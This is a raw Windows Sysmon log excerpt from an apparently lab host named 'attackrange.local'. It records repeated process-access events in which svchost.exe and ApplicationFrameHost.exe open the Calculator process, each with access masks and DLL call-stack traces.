22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362202Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362201Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362200Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362199Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362198Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362197Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362196Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362195Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362194Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362193Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362192Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362191Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362190Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362189Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362188Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362187Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362186Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362185Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362184Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362183Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362182Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362181Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 